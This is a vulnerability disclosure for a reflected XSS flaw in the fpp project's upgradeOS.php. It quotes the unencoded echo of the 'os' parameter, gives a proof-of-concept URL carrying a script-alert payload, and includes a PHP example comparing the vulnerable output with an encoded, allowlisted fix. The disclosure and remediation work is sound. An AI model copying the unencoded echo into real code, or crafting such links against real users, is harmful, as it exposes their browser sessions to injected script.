Cross-site Scripting (XSS) - Reflected in falconchristmas/fpp
Reported on
May 29th 2021
✍️ Description
An XSS vulnerability is present in https://github.com/FalconChristmas/fpp/blob/f032d800a67ed280f8d577d95519a71c95114579/www/upgradeOS.php#L26
because the os query parameter is echoed into the page without any sanitization or output encoding:
Image: <? echo $_GET['os']; ?><br>
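To show the pattern behind the report and its fix, here is an added example that is not code from the fpp project: the vulnerable echo of $_GET['os'] next to a hardened version that HTML-encodes the value and, as defence in depth, checks the parameter against an allowlisted shape before using it. The helper names (renderOsLine, renderOsLineSafe, validOsImageName) and the image-name pattern are assumptions made for this illustration.

```php
<?php
// Added example, not code from the fpp project.
// Helper names and the allowlist pattern are assumptions for illustration.

declare(strict_types=1);

// Vulnerable pattern (as in the report): the query parameter is written into
// the HTML response unchanged, so markup in ?os=... is rendered by the browser.
function renderOsLine(string $os): string
{
    return "Image: " . $os . "<br>";
}

// Hardened: encode the value for the context it is written into (HTML body).
// ENT_QUOTES encodes both quote styles, ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string, and the explicit charset
// must match the page's declared encoding.
function renderOsLineSafe(string $os): string
{
    $encoded = htmlspecialchars($os, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Image: " . $encoded . "<br>";
}

// Defence in depth: the parameter names an OS image file, so reject anything
// that is not a plain single-segment file name before it is used anywhere,
// not only when it is echoed. The pattern below is a hypothetical allowlist.
function validOsImageName(string $os): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,127}\z/', $os);
}

// Constructed sample input mirroring the PoC payload from the report.
$payload = "<script>alert('zer0h')</script>";

echo renderOsLine($payload), "\n";     // markup reaches the browser intact
echo renderOsLineSafe($payload), "\n"; // angle brackets and quotes are entity-encoded

// The allowlist rejects the payload and accepts a constructed, plausible image name.
var_dump(validOsImageName($payload));
var_dump(validOsImageName('fpp-image-constructed.img'));
```

Run it with `php example.php` and compare the two echoed lines: the first contains a live script element, the second contains only text. Encoding at the point of output is the fix for the reported issue; the allowlist check guards the other places where the same parameter is likely used (for instance when selecting a file on disk) and should be applied before the value is used at all.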
🕵️‍♂️ Proof of Concept
Visit http://127.0.0.1/upgradeOS.php?os=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E
💥 Impact
Reflected XSS: JavaScript supplied in the os parameter executes in the browser of a user who opens the crafted link.